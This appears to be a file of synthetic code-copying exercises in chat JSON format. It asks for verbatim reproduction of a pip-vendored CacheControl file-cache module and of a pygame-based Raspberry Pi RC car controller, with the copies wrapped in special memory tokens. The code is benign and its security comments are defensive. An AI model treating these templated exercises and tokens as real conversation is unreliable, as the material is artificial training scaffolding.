'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
],
)
```
|
[
{
"content": "```python\nimport hashlib\nimport os\nfrom textwrap import dedent\n\nfrom ..cache import BaseCache\nfrom ..controller import CacheController\n\ntry:\n FileNotFoundError\nexcept NameError:\n # py2.X\n FileNotFoundError = IOError\n\n\ndef _secure_open_write(filename, fmode):\n # We only want to write to this file, so open it in write only mode\n flags = os.O_WRONLY\n\n # os.O_CREAT | os.O_EXCL will fail if the file already exists, so we only\n # will open *new* files.\n # We specify this because we want to ensure that the mode we pass is the\n # mode of the file.\n flags |= os.O_CREAT | os.O_EXCL\n\n # Do not follow symlinks to prevent someone from making a symlink that\n # we follow and insecurely open a cache file.\n if hasattr(os, \"O_NOFOLLOW\"):\n flags |= os.O_NOFOLLOW\n\n # On Windows we'll mark this file as binary\n if hasattr(os, \"O_BINARY\"):\n flags |= os.O_BINARY\n\n # Before we open our file, we want to delete any existing file that is\n # there\n try:\n os.remove(filename)\n except (IOError, OSError):\n # The file must not exist already, so we can just skip ahead to opening\n pass\n\n # Open our file, the use of os.O_CREAT | os.O_EXCL will ensure that if a\n # race condition happens between the os.remove and this line, that an\n # error will be raised. Because we utilize a lockfile this should only\n # happen if someone is attempting to attack us.\n fd = os.open(filename, flags, fmode)\n try:\n return os.fdopen(fd, \"wb\")\n except:\n # An error occurred wrapping our FD in a file object\n os.close(fd)\n raise\n\n\nclass FileCache(BaseCache):\n def __init__(self, directory, forever=False, filemode=0o0600,\n dirmode=0o0700, use_dir_lock=None, lock_class=None):\n\n if use_dir_lock is not None and lock_class is not None:\n raise ValueError(\"Cannot use use_dir_lock and lock_class together\")\n\n try:\n from pip._vendor.lockfile import LockFile\n from pip._vendor.lockfile.mkdirlockfile import MkdirLockFile\n except ImportError:\n notice = dedent(\"\"\"\n NOTE: In order to use the FileCache you must have\n lockfile installed. You can install it via pip:\n pip install lockfile\n \"\"\")\n raise ImportError(notice)\n else:\n if use_dir_lock:\n lock_class = MkdirLockFile\n\n elif lock_class is None:\n lock_class = LockFile\n\n self.directory = directory\n self.forever = forever\n self.filemode = filemode\n self.dirmode = dirmode\n self.lock_class = lock_class\n\n @staticmethod\n def encode(x):\n return hashlib.sha224(x.encode()).hexdigest()\n\n def _fn(self, name):\n # NOTE: This method should not change as some may depend on it.\n # See: https://github.com/ionrock/cachecontrol/issues/63\n hashed = self.encode(name)\n parts = list(hashed[:5]) + [hashed]\n return os.path.join(self.directory, *parts)\n\n def get(self, key):\n name = self._fn(key)\n if not os.path.exists(name):\n return None\n\n with open(name, 'rb') as fh:\n return fh.read()\n\n def set(self, key, value):\n name = self._fn(key)\n\n # Make sure the directory exists\n try:\n os.makedirs(os.path.dirname(name), self.dirmode)\n except (IOError, OSError):\n pass\n\n with self.lock_class(name) as lock:\n # Write our actual file\n with _secure_open_write(lock.path, self.filemode) as fh:\n fh.write(value)\n\n def delete(self, key):\n name = self._fn(key)\n if not self.forever:\n try:\n os.remove(name)\n except FileNotFoundError:\n pass\n\n\ndef url_to_file_path(url, filecache):\n \"\"\"Return the file cache path based on the URL.\n\n This does not ensure the file exists!\n \"\"\"\n key = CacheController.cache_url(url)\n return filecache._fn(key)\n```\nReproduce the code exactly as provided.",
"role": "user"
}
] |
[
{
"content": "<|memory_start|>```python\nimport hashlib\nimport os\nfrom textwrap import dedent\n\nfrom ..cache import BaseCache\nfrom ..controller import CacheController\n\ntry:\n FileNotFoundError\nexcept NameError:\n # py2.X\n FileNotFoundError = IOError\n\n\ndef _secure_open_write(filename, fmode):\n # We only want to write to this file, so open it in write only mode\n flags = os.O_WRONLY\n\n # os.O_CREAT | os.O_EXCL will fail if the file already exists, so we only\n # will open *new* files.\n # We specify this because we want to ensure that the mode we pass is the\n # mode of the file.\n flags |= os.O_CREAT | os.O_EXCL\n\n # Do not follow symlinks to prevent someone from making a symlink that\n # we follow and insecurely open a cache file.\n if hasattr(os, \"O_NOFOLLOW\"):\n flags |= os.O_NOFOLLOW\n\n # On Windows we'll mark this file as binary\n if hasattr(os, \"O_BINARY\"):\n flags |= os.O_BINARY\n\n # Before we open our file, we want to delete any existing file that is\n # there\n try:\n os.remove(filename)\n except (IOError, OSError):\n # The file must not exist already, so we can just skip ahead to opening\n pass\n\n # Open our file, the use of os.O_CREAT | os.O_EXCL will ensure that if a\n # race condition happens between the os.remove and this line, that an\n # error will be raised. Because we utilize a lockfile this should only\n # happen if someone is attempting to attack us.\n fd = os.open(filename, flags, fmode)\n try:\n return os.fdopen(fd, \"wb\")\n except:\n # An error occurred wrapping our FD in a file object\n os.close(fd)\n raise\n\n\nclass FileCache(BaseCache):\n def __init__(self, directory, forever=False, filemode=0o0600,\n dirmode=0o0700, use_dir_lock=None, lock_class=None):\n\n if use_dir_lock is not None and lock_class is not None:\n raise ValueError(\"Cannot use use_dir_lock and lock_class together\")\n\n try:\n from pip._vendor.lockfile import LockFile\n from pip._vendor.lockfile.mkdirlockfile import MkdirLockFile\n except ImportError:\n notice = dedent(\"\"\"\n NOTE: In order to use the FileCache you must have\n lockfile installed. You can install it via pip:\n pip install lockfile\n \"\"\")\n raise ImportError(notice)\n else:\n if use_dir_lock:\n lock_class = MkdirLockFile\n\n elif lock_class is None:\n lock_class = LockFile\n\n self.directory = directory\n self.forever = forever\n self.filemode = filemode\n self.dirmode = dirmode\n self.lock_class = lock_class\n\n @staticmethod\n def encode(x):\n return hashlib.sha224(x.encode()).hexdigest()\n\n def _fn(self, name):\n # NOTE: This method should not change as some may depend on it.\n # See: https://github.com/ionrock/cachecontrol/issues/63\n hashed = self.encode(name)\n parts = list(hashed[:5]) + [hashed]\n return os.path.join(self.directory, *parts)\n\n def get(self, key):\n name = self._fn(key)\n if not os.path.exists(name):\n return None\n\n with open(name, 'rb') as fh:\n return fh.read()\n\n def set(self, key, value):\n name = self._fn(key)\n\n # Make sure the directory exists\n try:\n os.makedirs(os.path.dirname(name), self.dirmode)\n except (IOError, OSError):\n pass\n\n with self.lock_class(name) as lock:\n # Write our actual file\n with _secure_open_write(lock.path, self.filemode) as fh:\n fh.write(value)\n\n def delete(self, key):\n name = self._fn(key)\n if not self.forever:\n try:\n os.remove(name)\n except FileNotFoundError:\n pass\n\n\ndef url_to_file_path(url, filecache):\n \"\"\"Return the file cache path based on the URL.\n\n This does not ensure the file exists!\n \"\"\"\n key = CacheController.cache_url(url)\n return filecache._fn(key)\n```<|memory_end|>\nReproduce the code exactly as provided.",
"role": "user"
}
] |
```python
import hashlib
import os
from textwrap import dedent
from ..cache import BaseCache
from ..controller import CacheController
try:
FileNotFoundError
except NameError:
# py2.X
FileNotFoundError = IOError
def _secure_open_write(filename, fmode):
# We only want to write to this file, so open it in write only mode
flags = os.O_WRONLY
# os.O_CREAT | os.O_EXCL will fail if the file already exists, so we only
# will open *new* files.
# We specify this because we want to ensure that the mode we pass is the
# mode of the file.
flags |= os.O_CREAT | os.O_EXCL
# Do not follow symlinks to prevent someone from making a symlink that
# we follow and insecurely open a cache file.
if hasattr(os, "O_NOFOLLOW"):
flags |= os.O_NOFOLLOW
# On Windows we'll mark this file as binary
if hasattr(os, "O_BINARY"):
flags |= os.O_BINARY
# Before we open our file, we want to delete any existing file that is
# there
try:
os.remove(filename)
except (IOError, OSError):
# The file must not exist already, so we can just skip ahead to opening
pass
# Open our file, the use of os.O_CREAT | os.O_EXCL will ensure that if a
# race condition happens between the os.remove and this line, that an
# error will be raised. Because we utilize a lockfile this should only
# happen if someone is attempting to attack us.
fd = os.open(filename, flags, fmode)
try:
return os.fdopen(fd, "wb")
except:
# An error occurred wrapping our FD in a file object
os.close(fd)
raise
class FileCache(BaseCache):
def __init__(self, directory, forever=False, filemode=0o0600,
dirmode=0o0700, use_dir_lock=None, lock_class=None):
if use_dir_lock is not None and lock_class is not None:
raise ValueError("Cannot use use_dir_lock and lock_class together")
try:
from pip._vendor.lockfile import LockFile
from pip._vendor.lockfile.mkdirlockfile import MkdirLockFile
except ImportError:
notice = dedent("""
NOTE: In order to use the FileCache you must have
lockfile installed. You can install it via pip:
pip install lockfile
""")
raise ImportError(notice)
else:
if use_dir_lock:
lock_class = MkdirLockFile
elif lock_class is None:
lock_class = LockFile
self.directory = directory
self.forever = forever
self.filemode = filemode
self.dirmode = dirmode
self.lock_class = lock_class
@staticmethod
def encode(x):
return hashlib.sha224(x.encode()).hexdigest()
def _fn(self, name):
# NOTE: This method should not change as some may depend on it.
# See: https://github.com/ionrock/cachecontrol/issues/63
hashed = self.encode(name)
parts = list(hashed[:5]) + [hashed]
return os.path.join(self.directory, *parts)
def get(self, key):
name = self._fn(key)
if not os.path.exists(name):
return None
with open(name, 'rb') as fh:
return fh.read()
def set(self, key, value):
name = self._fn(key)
# Make sure the directory exists
try:
os.makedirs(os.path.dirname(name), self.dirmode)
except (IOError, OSError):
pass
with self.lock_class(name) as lock:
# Write our actual file
with _secure_open_write(lock.path, self.filemode) as fh:
fh.write(value)
def delete(self, key):
name = self._fn(key)
if not self.forever:
try:
os.remove(name)
except FileNotFoundError:
pass
def url_to_file_path(url, filecache):
"""Return the file cache path based on the URL.
This does not ensure the file exists!
"""
key = CacheController.cache_url(url)
return filecache._fn(key)
```
|
[
{
"content": "```python\n#!/usr/bin/env python\n\"\"\"Manually send commands to the RC car.\"\"\"\nimport argparse\nimport json\nimport pygame\nimport pygame.font\nimport socket\nimport sys\n\nfrom common import server_up\n\nUP = LEFT = DOWN = RIGHT = False\nQUIT = False\n\n# pylint: disable=superfluous-parens\n\ndef dead_frequency(frequency):\n \"\"\"Returns an approprtiate dead signal frequency for the given signal.\"\"\"\n if frequency < 38:\n return 49.890\n return 26.995\n\n\ndef format_command(\n frequency,\n useconds\n):\n \"\"\"Returns the JSON command string for this command tuple.\"\"\"\n dead = dead_frequency(frequency)\n return {\n 'frequency': frequency,\n 'dead_frequency': dead,\n 'burst_us': useconds,\n 'spacing_us': useconds,\n 'repeats': 1,\n }\n\n\ndef input_function(type_cast):\n \"\"\"Returns the input function for the running version of Python for reading\n data from stdin.\n \"\"\"\n # pylint: disable=bad-builtin\n if sys.version_info.major == 2:\n return lambda message: type_cast(raw_input(message))\n else:\n return lambda message: type_cast(input(message))\n\n\ndef get_command_array(parser):\n \"\"\"Returns an array of command information that can be used in the\n format_command function.\n \"\"\"\n args = parser.parse_args()\n\n read_float = input_function(float)\n read_int = input_function(int)\n\n option_to_prompt_and_function = {\n 'frequency': ('Command frequency? ', read_float),\n }\n\n for option, prompt_and_function in option_to_prompt_and_function.items():\n if getattr(args, option) is None:\n prompt, function = prompt_and_function\n setattr(args, option, function(prompt))\n\n return [\n float(args.frequency),\n ]\n\n\ndef make_parser():\n \"\"\"Builds and returns an argument parser.\"\"\"\n parser = argparse.ArgumentParser(\n description='Sends burst commands to Raspberry Pi RC.'\n )\n\n parser.add_argument(\n '-p',\n '--port',\n dest='port',\n help='The port to send control commands to.',\n default=12345,\n type=int\n )\n parser.add_argument(\n '-s',\n '--server',\n dest='server',\n help='The server to send control commands to.',\n default='127.1'\n )\n\n parser.add_argument(\n '-f',\n '--frequency',\n dest='frequency',\n help='The frequency to broadcast commands on.'\n )\n\n return parser\n\n\ndef to_bit(number):\n if number > 0:\n return 1\n return 0\n\n\ndef ones_count(number):\n mask = 1\n ones = 0\n while mask <= number:\n ones += to_bit(mask & number)\n mask <<= 1\n return ones\n\n\ndef format_dune_warrior_command(throttle, turn, frequency):\n \"\"\"Formats a command to JSON to the Raspberry Pi.\"\"\"\n command = [format_command(frequency, 500)]\n if throttle >= 32 or throttle < 0:\n raise ValueError('Invalid throttle')\n # Turning too sharply causes the servo to push harder than it can go, so limit this\n if turn >= 58 or turn < 8:\n raise ValueError('Invalid turn')\n\n even_parity_bit = to_bit(\n (\n ones_count(throttle)\n + ones_count(turn)\n + 3\n ) % 2\n )\n\n bit_pattern = (\n to_bit(turn & 0x8),\n to_bit(turn & 0x4),\n to_bit(turn & 0x2),\n to_bit(turn & 0x1),\n 0,\n 0,\n to_bit(turn & 0x20),\n to_bit(turn & 0x10),\n to_bit(throttle & 0x10),\n to_bit(throttle & 0x8),\n to_bit(throttle & 0x4),\n to_bit(throttle & 0x2),\n to_bit(throttle & 0x1),\n 1,\n 1,\n 1,\n 0,\n 0,\n even_parity_bit,\n 0,\n 0,\n 0\n )\n assert(len(bit_pattern) == 22)\n assert(sum(bit_pattern) % 2 == 0)\n\n total_useconds = 1000\n for bit in bit_pattern[:-1]:\n if bit == 0:\n useconds = 127\n else:\n useconds = 200\n command.append(format_command(27.145, useconds))\n total_useconds += useconds\n\n if bit_pattern[-1] == 0:\n useconds = 127\n else:\n useconds = 200\n total_useconds += useconds\n command.append({\n 'frequency': frequency,\n 'dead_frequency': dead_frequency(frequency),\n 'burst_us': useconds,\n 'spacing_us': 7000 - total_useconds,\n 'repeats': 1,\n })\n\n command_str = json.dumps(command)\n if sys.version_info.major == 3:\n command_str = bytes(command_str, 'utf-8')\n return command_str\n\n\ndef get_keys():\n \"\"\"Returns a tuple of (UP, DOWN, LEFT, RIGHT, changed) representing which\n keys are UP or DOWN and whether or not the key states changed.\n \"\"\"\n change = False\n key_to_global_name = {\n pygame.K_LEFT: 'LEFT',\n pygame.K_RIGHT: 'RIGHT',\n pygame.K_UP: 'UP',\n pygame.K_DOWN: 'DOWN',\n pygame.K_ESCAPE: 'QUIT',\n pygame.K_q: 'QUIT',\n }\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n global QUIT\n QUIT = True\n elif event.type in {pygame.KEYDOWN, pygame.KEYUP}:\n down = (event.type == pygame.KEYDOWN)\n change = (event.key in key_to_global_name)\n\n if event.key in key_to_global_name:\n globals()[key_to_global_name[event.key]] = down\n\n return (UP, DOWN, LEFT, RIGHT, change)\n\n\ndef interactive_control(host, port, frequency):\n \"\"\"Runs the interactive control.\"\"\"\n pygame.init()\n size = (300, 400)\n screen = pygame.display.set_mode(size)\n # pylint: disable=too-many-function-args\n background = pygame.Surface(screen.get_size())\n clock = pygame.time.Clock()\n black = (0, 0, 0)\n white = (255, 255, 255)\n big_font = pygame.font.Font(None, 40)\n little_font = pygame.font.Font(None, 24)\n\n pygame.display.set_caption('Dune Warrior')\n\n text = big_font.render('Use arrows to move', 1, white)\n text_position = text.get_rect(centerx=size[0] / 2)\n background.blit(text, text_position)\n screen.blit(background, (0, 0))\n pygame.display.flip()\n\n sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\n while not QUIT:\n up, down, left, right, change = get_keys()\n\n if change:\n # Something changed, so send a new command\n throttle = 16\n turn = 32\n if up:\n throttle = 24\n elif down:\n throttle = 8\n\n if left:\n turn = 12\n elif right:\n turn = 52\n\n command_json = format_dune_warrior_command(throttle, turn, frequency)\n sock.sendto(command_json, (host, port))\n\n # Show the command and JSON\n background.fill(black)\n text = big_font.render(command_json[:100], 1, white)\n text_position = text.get_rect(centerx=size[0] / 2)\n background.blit(text, text_position)\n\n pretty = json.dumps(json.loads(command_json), indent=4)\n pretty_y_position = big_font.size(command_json)[1] + 10\n for line in pretty.split('\\n'):\n text = little_font.render(line, 1, white)\n text_position = text.get_rect(x=0, y=pretty_y_position)\n pretty_y_position += little_font.size(line)[1]\n background.blit(text, text_position)\n\n screen.blit(background, (0, 0))\n pygame.display.flip()\n\n # Limit to 20 frames per second\n clock.tick(60)\n\n pygame.quit()\n\n\ndef make_parser():\n \"\"\"Builds and returns an argument parser.\"\"\"\n parser = argparse.ArgumentParser(\n description='Interactive controller for the Raspberry Pi RC.'\n )\n parser.add_argument(\n '-p',\n '--port',\n dest='port',\n help='The port to send control commands to.',\n type=int,\n default=12345,\n )\n parser.add_argument(\n '-s',\n '--server',\n dest='server',\n help='The server to send control commands to.',\n type=str,\n default='127.1',\n )\n parser.add_argument(\n '-f',\n '--frequency',\n dest='frequency',\n help='The frequency to broadcast signals on.',\n type=float,\n default=27.145,\n )\n return parser\n\n\ndef main():\n \"\"\"Parses command line arguments and runs the interactive controller.\"\"\"\n parser = make_parser()\n args = parser.parse_args()\n\n print('Sending commands to ' + args.server + ':' + str(args.port))\n if not server_up(args.server, args.port, args.frequency):\n sys.stderr.write('Unable to contact server; did you start it?\\n')\n sys.exit(1)\n\n interactive_control(args.server, args.port, args.frequency)\n\nif __name__ == '__main__':\n main()\n```\nReturn the exact code text, without paraphrasing.",
"role": "user"
}
] |
[
{
"content": "<|memory_start|>```python\n#!/usr/bin/env python\n\"\"\"Manually send commands to the RC car.\"\"\"\nimport argparse\nimport json\nimport pygame\nimport pygame.font\nimport socket\nimport sys\n\nfrom common import server_up\n\nUP = LEFT = DOWN = RIGHT = False\nQUIT = False\n\n# pylint: disable=superfluous-parens\n\ndef dead_frequency(frequency):\n \"\"\"Returns an approprtiate dead signal frequency for the given signal.\"\"\"\n if frequency < 38:\n return 49.890\n return 26.995\n\n\ndef format_command(\n frequency,\n useconds\n):\n \"\"\"Returns the JSON command string for this command tuple.\"\"\"\n dead = dead_frequency(frequency)\n return {\n 'frequency': frequency,\n 'dead_frequency': dead,\n 'burst_us': useconds,\n 'spacing_us': useconds,\n 'repeats': 1,\n }\n\n\ndef input_function(type_cast):\n \"\"\"Returns the input function for the running version of Python for reading\n data from stdin.\n \"\"\"\n # pylint: disable=bad-builtin\n if sys.version_info.major == 2:\n return lambda message: type_cast(raw_input(message))\n else:\n return lambda message: type_cast(input(message))\n\n\ndef get_command_array(parser):\n \"\"\"Returns an array of command information that can be used in the\n format_command function.\n \"\"\"\n args = parser.parse_args()\n\n read_float = input_function(float)\n read_int = input_function(int)\n\n option_to_prompt_and_function = {\n 'frequency': ('Command frequency? ', read_float),\n }\n\n for option, prompt_and_function in option_to_prompt_and_function.items():\n if getattr(args, option) is None:\n prompt, function = prompt_and_function\n setattr(args, option, function(prompt))\n\n return [\n float(args.frequency),\n ]\n\n\ndef make_parser():\n \"\"\"Builds and returns an argument parser.\"\"\"\n parser = argparse.ArgumentParser(\n description='Sends burst commands to Raspberry Pi RC.'\n )\n\n parser.add_argument(\n '-p',\n '--port',\n dest='port',\n help='The port to send control commands to.',\n default=12345,\n type=int\n )\n parser.add_argument(\n '-s',\n '--server',\n dest='server',\n help='The server to send control commands to.',\n default='127.1'\n )\n\n parser.add_argument(\n '-f',\n '--frequency',\n dest='frequency',\n help='The frequency to broadcast commands on.'\n )\n\n return parser\n\n\ndef to_bit(number):\n if number > 0:\n return 1\n return 0\n\n\ndef ones_count(number):\n mask = 1\n ones = 0\n while mask <= number:\n ones += to_bit(mask & number)\n mask <<= 1\n return ones\n\n\ndef format_dune_warrior_command(throttle, turn, frequency):\n \"\"\"Formats a command to JSON to the Raspberry Pi.\"\"\"\n command = [format_command(frequency, 500)]\n if throttle >= 32 or throttle < 0:\n raise ValueError('Invalid throttle')\n # Turning too sharply causes the servo to push harder than it can go, so limit this\n if turn >= 58 or turn < 8:\n raise ValueError('Invalid turn')\n\n even_parity_bit = to_bit(\n (\n ones_count(throttle)\n + ones_count(turn)\n + 3\n ) % 2\n )\n\n bit_pattern = (\n to_bit(turn & 0x8),\n to_bit(turn & 0x4),\n to_bit(turn & 0x2),\n to_bit(turn & 0x1),\n 0,\n 0,\n to_bit(turn & 0x20),\n to_bit(turn & 0x10),\n to_bit(throttle & 0x10),\n to_bit(throttle & 0x8),\n to_bit(throttle & 0x4),\n to_bit(throttle & 0x2),\n to_bit(throttle & 0x1),\n 1,\n 1,\n 1,\n 0,\n 0,\n even_parity_bit,\n 0,\n 0,\n 0\n )\n assert(len(bit_pattern) == 22)\n assert(sum(bit_pattern) % 2 == 0)\n\n total_useconds = 1000\n for bit in bit_pattern[:-1]:\n if bit == 0:\n useconds = 127\n else:\n useconds = 200\n command.append(format_command(27.145, useconds))\n total_useconds += useconds\n\n if bit_pattern[-1] == 0:\n useconds = 127\n else:\n useconds = 200\n total_useconds += useconds\n command.append({\n 'frequency': frequency,\n 'dead_frequency': dead_frequency(frequency),\n 'burst_us': useconds,\n 'spacing_us': 7000 - total_useconds,\n 'repeats': 1,\n })\n\n command_str = json.dumps(command)\n if sys.version_info.major == 3:\n command_str = bytes(command_str, 'utf-8')\n return command_str\n\n\ndef get_keys():\n \"\"\"Returns a tuple of (UP, DOWN, LEFT, RIGHT, changed) representing which\n keys are UP or DOWN and whether or not the key states changed.\n \"\"\"\n change = False\n key_to_global_name = {\n pygame.K_LEFT: 'LEFT',\n pygame.K_RIGHT: 'RIGHT',\n pygame.K_UP: 'UP',\n pygame.K_DOWN: 'DOWN',\n pygame.K_ESCAPE: 'QUIT',\n pygame.K_q: 'QUIT',\n }\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n global QUIT\n QUIT = True\n elif event.type in {pygame.KEYDOWN, pygame.KEYUP}:\n down = (event.type == pygame.KEYDOWN)\n change = (event.key in key_to_global_name)\n\n if event.key in key_to_global_name:\n globals()[key_to_global_name[event.key]] = down\n\n return (UP, DOWN, LEFT, RIGHT, change)\n\n\ndef interactive_control(host, port, frequency):\n \"\"\"Runs the interactive control.\"\"\"\n pygame.init()\n size = (300, 400)\n screen = pygame.display.set_mode(size)\n # pylint: disable=too-many-function-args\n background = pygame.Surface(screen.get_size())\n clock = pygame.time.Clock()\n black = (0, 0, 0)\n white = (255, 255, 255)\n big_font = pygame.font.Font(None, 40)\n little_font = pygame.font.Font(None, 24)\n\n pygame.display.set_caption('Dune Warrior')\n\n text = big_font.render('Use arrows to move', 1, white)\n text_position = text.get_rect(centerx=size[0] / 2)\n background.blit(text, text_position)\n screen.blit(background, (0, 0))\n pygame.display.flip()\n\n sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\n while not QUIT:\n up, down, left, right, change = get_keys()\n\n if change:\n # Something changed, so send a new command\n throttle = 16\n turn = 32\n if up:\n throttle = 24\n elif down:\n throttle = 8\n\n if left:\n turn = 12\n elif right:\n turn = 52\n\n command_json = format_dune_warrior_command(throttle, turn, frequency)\n sock.sendto(command_json, (host, port))\n\n # Show the command and JSON\n background.fill(black)\n text = big_font.render(command_json[:100], 1, white)\n text_position = text.get_rect(centerx=size[0] / 2)\n background.blit(text, text_position)\n\n pretty = json.dumps(json.loads(command_json), indent=4)\n pretty_y_position = big_font.size(command_json)[1] + 10\n for line in pretty.split('\\n'):\n text = little_font.render(line, 1, white)\n text_position = text.get_rect(x=0, y=pretty_y_position)\n pretty_y_position += little_font.size(line)[1]\n background.blit(text, text_position)\n\n screen.blit(background, (0, 0))\n pygame.display.flip()\n\n # Limit to 20 frames per second\n clock.tick(60)\n\n pygame.quit()\n\n\ndef make_parser():\n \"\"\"Builds and returns an argument parser.\"\"\"\n parser = argparse.ArgumentParser(\n description='Interactive controller for the Raspberry Pi RC.'\n )\n parser.add_argument(\n '-p',\n '--port',\n dest='port',\n help='The port to send control commands to.',\n type=int,\n default=12345,\n )\n parser.add_argument(\n '-s',\n '--server',\n dest='server',\n help='The server to send control commands to.',\n type=str,\n default='127.1',\n )\n parser.add_argument(\n '-f',\n '--frequency',\n dest='frequency',\n help='The frequency to broadcast signals on.',\n type=float,\n default=27.145,\n )\n return parser\n\n\ndef main():\n \"\"\"Parses command line arguments and runs the interactive controller.\"\"\"\n parser = make_parser()\n args = parser.parse_args()\n\n print('Sending commands to ' + args.server + ':' + str(args.port))\n if not server_up(args.server, args.port, args.frequency):\n sys.stderr.write('Unable to contact server; did you start it?\\n')\n sys.exit(1)\n\n interactive_control(args.server, args.port, args.frequency)\n\nif __name__ == '__main__':\n main()\n```<|memory_end|>\nReturn the exact code text, without paraphrasing.",
"role": "user"
}
] |
```python
#!/usr/bin/env python
"""Manually send commands to the RC car."""
import argparse
import json
import pygame
import pygame.font
import socket
import sys
from common import server_up
UP = LEFT = DOWN = RIGHT = False
QUIT = False
# pylint: disable=superfluous-parens
def dead_frequency(frequency):
"""Returns an approprtiate dead signal frequency for the given signal."""
if frequency < 38:
return 49.890
return 26.995
def format_command(
frequency,
useconds
):
"""Returns the JSON command string for this command tuple."""
dead = dead_frequency(frequency)
return {
'frequency': frequency,
'dead_frequency': dead,
'burst_us': useconds,
'spacing_us': useconds,
'repeats': 1,
}
def input_function(type_cast):
"""Returns the input function for the running version of Python for reading
data from stdin.
"""
# pylint: disable=bad-builtin
if sys.version_info.major == 2:
return lambda message: type_cast(raw_input(message))
else:
return lambda message: type_cast(input(message))
def get_command_array(parser):
"""Returns an array of command information that can be used in the
format_command function.
"""
args = parser.parse_args()
read_float = input_function(float)
read_int = input_function(int)
option_to_prompt_and_function = {
'frequency': ('Command frequency? ', read_float),
}
for option, prompt_and_function in option_to_prompt_and_function.items():
if getattr(args, option) is None:
prompt, function = prompt_and_function
setattr(args, option, function(prompt))
return [
float(args.frequency),
]
def make_parser():
"""Builds and returns an argument parser."""
parser = argparse.ArgumentParser(
description='Sends burst commands to Raspberry Pi RC.'
)
parser.add_argument(
'-p',
'--port',
dest='port',
help='The port to send control commands to.',
default=12345,
type=int
)
parser.add_argument(
'-s',
'--server',
dest='server',
help='The server to send control commands to.',
default='127.1'
)
parser.add_argument(
'-f',
'--frequency',
dest='frequency',
help='The frequency to broadcast commands on.'
)
return parser
def to_bit(number):
if number > 0:
return 1
return 0
def ones_count(number):
mask = 1
ones = 0
while mask <= number:
ones += to_bit(mask & number)
mask <<= 1
return ones
def format_dune_warrior_command(throttle, turn, frequency):
"""Formats a command to JSON to the Raspberry Pi."""
command = [format_command(frequency, 500)]
if throttle >= 32 or throttle < 0:
raise ValueError('Invalid throttle')
# Turning too sharply causes the servo to push harder than it can go, so limit this
if turn >= 58 or turn < 8:
raise ValueError('Invalid turn')
even_parity_bit = to_bit(
(
ones_count(throttle)
+ ones_count(turn)
+ 3
) % 2
)
bit_pattern = (
to_bit(turn & 0x8),
to_bit(turn & 0x4),
to_bit(turn & 0x2),
to_bit(turn & 0x1),
0,
0,
to_bit(turn & 0x20),
to_bit(turn & 0x10),
to_bit(throttle & 0x10),
to_bit(throttle & 0x8),
to_bit(throttle & 0x4),
to_bit(throttle & 0x2),
to_bit(throttle & 0x1),
1,
1,
1,
0,
0,
even_parity_bit,
0,
0,
0
)
assert(len(bit_pattern) == 22)
assert(sum(bit_pattern) % 2 == 0)
total_useconds = 1000
for bit in bit_pattern[:-1]:
if bit == 0:
useconds = 127
else:
useconds = 200
command.append(format_command(27.145, useconds))
total_useconds += useconds
if bit_pattern[-1] == 0:
useconds = 127
else:
useconds = 200
total_useconds += useconds
command.append({
'frequency': frequency,
'dead_frequency': dead_frequency(frequency),
'burst_us': useconds,
'spacing_us': 7000 - total_useconds,
'repeats': 1,
})
command_str = json.dumps(command)
if sys.version_info.major == 3:
command_str = bytes(command_str, 'utf-8')
return command_str
def get_keys():
"""Returns a tuple of (UP, DOWN, LEFT, RIGHT, changed) representing which
keys are UP or DOWN and whether or not the key states changed.
"""
change = False
key_to_global_name = {
pygame.K_LEFT: 'LEFT',
pygame.K_RIGHT: 'RIGHT',
pygame.K_UP: 'UP',
pygame.K_DOWN: 'DOWN',
pygame.K_ESCAPE: 'QUIT',
pygame.K_q: 'QUIT',
}
for event in pygame.event.get():
if event.type == pygame.QUIT:
global QUIT
QUIT = True
elif event.type in {pygame.KEYDOWN, pygame.KEYUP}:
down = (event.type == pygame.KEYDOWN)
change = (event.key in key_to_global_name)
if event.key in key_to_global_name:
globals()[key_to_global_name[event.key]] = down
return (UP, DOWN, LEFT, RIGHT, change)
def interactive_control(host, port, frequency):
"""Runs the interactive control."""
pygame.init()
size = (300, 400)
screen = pygame.display.set_mode(size)
# pylint: disable=too-many-function-args
background = pygame.Surface(screen.get_size())
clock = pygame.time.Clock()
black = (0, 0, 0)
white = (255, 255, 255)
big_font = pygame.font.Font(None, 40)
little_font = pygame.font.Font(None, 24)
pygame.display.set_caption('Dune Warrior')
text = big_font.render('Use arrows to move', 1, white)
text_position = text.get_rect(centerx=size[0] / 2)
background.blit(text, text_position)
screen.blit(background, (0, 0))
pygame.display.flip()
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
while not QUIT:
up, down, left, right, change = get_keys()
if change:
# Something changed, so send a new command
throttle = 16
turn = 32
if up:
throttle = 24
elif down:
throttle = 8
if left:
turn = 12
elif right:
turn = 52
command_json = format_dune_warrior_command(throttle, turn, frequency)
sock.sendto(command_json, (host, port))
# Show the command and JSON
background.fill(black)
text = big_font.render(command_json[:100], 1, white)
text_position = text.get_rect(centerx=size[0] / 2)
background.blit(text, text_position)
pretty = json.dumps(json.loads(command_json), indent=4)
pretty_y_position = big_font.size(command_json)[1] + 10
for line in pretty.split('\n'):
text = little_font.render(line, 1, white)
text_position = text.get_rect(x=0, y=pretty_y_position)
pretty_y_position += little_font.size(line)[1]
background.blit(text, text_position)
screen.blit(background, (0, 0))
pygame.display.flip()
# Limit to 20 frames per second
clock.tick(60)
pygame.quit()
def make_parser():
"""Builds and returns an argument parser."""
parser = argparse.ArgumentParser(
description='Interactive controller for the Raspberry Pi RC.'
)
parser.add_argument(
'-p',
'--port',
dest='port',
help='The port to send control commands to.',
type=int,
default=12345,
)
parser.add_argument(
'-s',
'--server',
dest='server',
help='The server to send control commands to.',
type=str,
default='127.1',
)
parser.add_argument(
'-f',
'--frequency',
dest='frequency',
help='The frequency to broadcast signals on.',
type=float,
default=27.145,
)
return parser
def main():
"""Parses command line arguments and runs the interactive controller."""
parser = make_parser()
args = parser.parse_args()
print('Sending commands to ' + args.server + ':' + str(args.port))
if not server_up(args.server, args.port, args.frequency):
sys.stderr.write('Unable to contact server; did you start it?\n')
sys.exit(1)
interactive_control(args.server, args.port, args.frequency)
if __name__ == '__main__':
main()
```
|
[
{
